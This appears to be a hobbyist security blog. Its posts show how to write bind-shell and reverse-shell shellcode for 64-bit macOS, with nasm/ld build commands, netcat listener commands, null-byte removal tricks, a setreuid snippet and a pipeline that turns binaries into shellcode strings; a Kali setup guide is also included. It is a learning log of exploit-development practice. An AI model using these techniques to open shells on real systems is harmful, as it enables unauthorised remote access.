bindshell

This is my second try, and now the goal is to write some code to setup a listening server for OSX 64-bit system. I started with creating the c code to do the job to have someting to work from the code can be found here Will keep this post a bit short as much of the things to do are described in my previous post, Reverse Shell. Following the c code I cam up with this assembler version. (Had some problem with the code, but @norsec0de and @TheColonial helped me to fix it, big thx to them for the help)

bindshell, Usage:

bindshell start a listening server that you can connect to with the command: nc -nv 127.0.0.1 4444 in another folder for example your home directory

1
2
3

  nasm -g -f macho64 bindshell.s
  ld  -arch x86_64 -macosx_version_min 10.7.0 -lSystem -o bindshell bindshell.o
  ./bindshell

Go to the terminal and run nc -nv 127.0.0.1 4444 then type ls, you should now see a directory listing of the directory you started bindshell in.

The next step was to convert it to something that could be used as payload, i.e remove “bad values”, see the reverse shell post. I ended up with this, not optomized with respect of length the result was bindshell_no_bad_values.s. Then I converted this to shell code values and tried the c code bindshell_test.c there was some problems could not get the code to listen for incoming calls. To solve that I used the excellent command dtruss ./bindshell_test and by looking at the output I found that my socket call got the wrong values this I fixed by adding the setuid call. Example of what dtruss result in can be seen bellow:

1
2
3
4
5
6
7
8
9
10
11
12

.
.
.
getaudit_addr(0x7FFF554B7C90, 0x30, 0x0)   = 0 0
csops(0x16821, 0x7, 0x7FFF554B7870)        = -1 Err#22
setuid(0x0, 0x0, 0x7FFF554B89F0)           = 0 0
socket(0x2, 0x1, 0x0)                      = 3 0
bind(0x3, 0x7FFF554B89AC, 0x10)            = 0 0
listen(0x3, 0x0, 0x0)                      = 0 0
close(0x3)                                 = 0 0
.
.

Then that was done the c code worded as expected. For simplicity I also include a Makefile to compile the various examples. To continue my road into the shell code I bought The Shellcoder’s Handbook: Discovering and Exploiting Security Holes Do not know if the next post will be something about wifi hacking or assembler the time will tell.

A quick guide to setup kali linux with some extras.

As I just got myself a ultrabook and wanted a linux distribution to experiment with security setups and some development. The installation is a normal kali linux with customized tmux, ruby on rails develop envoronment.

Item that need to be instaled are:

• sublime (text editor)
• Redis (fast key, value database)
• nodejs (javascript runtime)

tmux

change default b to a for easier keybinding, the tmux.conf can be found here tmux.conf

git

So we can have version controll, follow the instructions on github ssh key setup

Sublime

Download sublime2 here or sublime2 here I choose sublime2, then extract the package with : tar xf Sublime\ Text\ 2.0.1\ x64.tar.bz2

You’ll get a “Sublime Text 2″ folder after extraction. This folder contains all the files that Sublime Text will need. Then I moved it to “/opt/” folder : mv Sublime\ Text\ 2 /opt/

To be able to use it from a terminal with “sublime”. For that just create a symbolic link in “/usr/bin” : ln -s /opt/Sublime\ Text\ 2/sublime_text /usr/bin/sublime

Redis

Just download the 64-bit verion here with wget http://download.redis.io/redis-stable.tar.gz there is also a online guide here to unpack use tar xvzf redis-stable.tar.gz change directory and comåile with make Do not forget to run make test after, to install run make install this will just copy the binary files so that you can start Redis then needed. To install it as service check the file README

NodeJS

This is a Javascript runtime that is needed to run various rails applications, I added the debian repository in /etc/apt/sources.list just add this line : add deb http://ftp.de.debian.org/debian sid main and run the following commands apt-get update followed by apt-get install nodejs

reverse_shell

My first attempt was to write a reverse shell to be used in Mac OSX 64-bit system, one of the first obstacles was to find the header file with the id for syscalls. After some google I found an excellent page with them here. The first steep was to write some c code that did the same job and from that deduce the correct order of the syscalls. This resulted in the file reverse_shell.s, and keep in mind that in 64-bit the calls need to be in the form, 0x2000061 for the syscall 61. The complete code for reverse_shell.s. The page have a good description of the registers and the naming it also include a tutorial to assembly programming. The first order of business is to change from the nasm that apple supply, go to nasm download osx and download the macox version.

reverse_shell, Usage:

Program that call out to a service that is listening to port 4444, the ip is set to any for simplicity. It is written for mac osx 64 bit

Start a listening server with the command: nc -l 4444 in another folder for example your home directory

1
2
3

  nasm -g -f macho64 reverse_shell.s
  ld  -arch x86_64 -macosx_version_min 10.7.0 -lSystem -o reverse_shell reverse_shell.o
  ./reverse_shell

To use the code as a string payload, one need to remove the NULL bytes, these can be found by running: otool -lV reverse_shell and identify the mov instructions that need to be modified. The reason are the numerous NULL bytes (\x00). Most buffer overflow errors are related to C stdlib string functions: strcpy(), sprintf(), strcat(), and so on. All of these functions use the NULL symbol to indicate the end of a string. Therefore, a function will not read shellcode after the first occurring NULL byte. There are other delimiters like linefeed (0x0A), carriage return (0x0D), 0xFF, and others.

Binary to string

To convert the binary to string values that can be used as a payload use

1

  gobjdump -d ./$1|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g' > dump.txt

By inspecting this file, we see quite few NULL(0x00) and these has to be removed A simple paste -d'\0' -s dump.txt will combine all rows into one that can then be copied into the C file. Ànother way to find bad values is:

1

 gobjdump -D reverse_shell -M intel |grep 00

By using the above and to find the problematic instructions and that most of them include the mov instruction and that the data we move is stored in the lowest byte of the 64-bit registers. We can use mov dil, 2 instead of mov rdi, 2. Using this and that we can construct the syscall setuid mov rax, 0x2000017 by using the following instructions

1
2
3
4

 mov r8b, 0x02               ; unix class system calls = 2
 shl r8, 24                  ; shift left 24 to the upper order bits
 or r8, 0x17                 ; setreuid is 0x17
 mov rax, r8                 ; put setreuid syscall # into rax

The last part is now to get rid of the NULL terminated string db '/bin/sh', 0 this we do by using a simple ruby command (remember that osx is little endian)

1
2

  "/bin//sh".unpack('H*')
  => ["2f62696e2f2f7368"] and that give us the value to use as: 0x68732f2f6e69622f

The result of doing these manipulations can be found in reverse_shell_no_bad_values.s A more simple command to use is the osx otool, otool -t reverse_shell_no_bad_values.o to generate the hex values we need to be able to test our reverse_shell code in a simple c-program, reverse_shell_test.c. Start your netcat server nc -l 4444 then run the c code and it should call out to you can check that it works by doing some normal shell commands. To simplify the compilation you can use the supplied Makefile.

This is the first post using octopress, started the blog to document my path into shell code programming and other security related. Will try to describe my progress and difficulties I encounter during the way, maybe include some standard programs, like how to develop a module for nginx(found that there is not an abundance of information about that). Other interests is developing in ruby on rails so will try to include something about that to.